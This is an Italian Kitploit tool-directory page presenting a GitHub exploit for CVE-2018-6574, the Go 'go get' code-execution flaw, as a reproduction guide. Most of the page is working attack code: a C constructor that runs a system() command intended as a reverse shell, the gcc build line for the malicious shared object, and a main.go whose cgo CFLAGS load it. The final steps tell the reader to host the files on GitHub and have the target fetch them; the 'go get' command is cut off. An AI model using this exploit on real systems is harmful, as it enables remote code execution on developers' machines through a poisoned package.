Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-6574 — Exploit Golang cgo per CVE-2018-6574 | Kitploit
Strumenti/GitHubGitHub/paulogmota/cve-2018-6574
Analisi delle VulnerabilitàExploitShellcodePenetration TestingSviluppo PayloadBinary Exploitation
GitHubpaulogmota/cve-2018-6574

CVE-2018-6574

Exploit Golang cgo per CVE-2018-6574

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2018-6574

Passaggi per riprodurre:

  1. Creare un file .c contenente il comando malevolo (revshell):
root@kitploit:~
#include<stdio.h>
#include<stdlib.h>

static void malicious() __attribute__((constructor));

void malicious() {
  system("<insert your command here>");
}
  1. Compilarlo usando GCC. È necessario compilarlo sulla stessa architettura e sistema operativo del target (es. Linux x86_64):
root@kitploit:~
gcc -shared -o attack.so -fPIC attack.c
  1. Creare un file main.go contenente gli header che diranno a Go di usare il nostro plugin malevolo:
root@kitploit:~
package main
// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int bridge_int_func(intFunc f){
//   return f();
// }
//
// int fortytwo(){
//   return 42;
// }
import "C"
import "fmt"

func main() {
    f := C.intFunc(C.fortytwo)
    fmt.Println(int(C.bridge_int_func(f)))
    // Output: 42
}
  1. Caricare i file main.go e attack.so su un repository GitHub
  2. Sulla macchina target, eseguire il comando `go get github.com//
  3. Sii felice
Scarica lo strumento